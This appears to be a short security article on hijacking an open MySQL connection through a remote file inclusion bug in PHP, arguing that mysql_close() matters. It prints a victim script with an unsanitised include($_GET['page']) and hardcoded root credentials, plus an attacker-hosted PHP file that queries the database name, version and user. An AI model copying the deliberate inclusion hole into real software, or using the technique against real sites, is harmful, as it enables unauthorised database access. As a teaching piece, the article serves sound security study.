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MySQL Connection

Hijacking over RFI

- Important of the mysql_close() -

Canberk BOLAT <>

0x01 – Introduction
This article writed for focus the important of the mysql_close function. I
describe it shortly, mysql_close function kill the current link identifier's
session. In documents its described like this;
mysql_close() closes the non-persistent connection to the MySQL server
that's associated with the specified link identifier. If link_identifier isn't
specified, the last opened link is used.

Using mysql_close() isn't usually necessary, as non-persistent open links are

automatically closed at the end of the script's execution. See also freeing

But there is something happens wrong. Because second section of the

description says, you don't need to use this because current link identifier
already closed end of the script's execution.

0x02 – Attack it!!

I think this description is wrong of the document. Because if i

can inject my codes the script then i can execute any sql queries like script
with using current mysql connection session. Now i demonstrating it. Victim
file is test.php at http://world/pt/test.php and this file didn't use
mysql_close() function by trust to documentation. Source code of the
test.php is as follows.

$host = "localhost";
$user = "root";
$pass = "rootpass";
$db = "joo";
// Current
$connect = mysql_connect($host,$user,$pass);

$query = mysql_query("SELECT uname FROM lol");

while($lol = mysql_fetch_array($query)){
echo "we get it: ".$lol["uname"]."<br>";

include($_GET["page"]); // SCRIPT HAVE RFI

Now i will attack the victim. I send the request to page parameter of the
test.php and i include the EVIL file that hosted at

$evil = mysql_query("SELECT concat_ws(0x3a,database(),version(),user());");
$a = mysql_fetch_array($evil);
echo $a[0];

And result is here;

Yes!!! We hijacked the current mysql connection session and our sql query
was executed. We see close the current connection is important. But if the
script have remote file inclusion vulnerability before the mysql_close()
function we can't do anything, because human factor in the security will
change everything.

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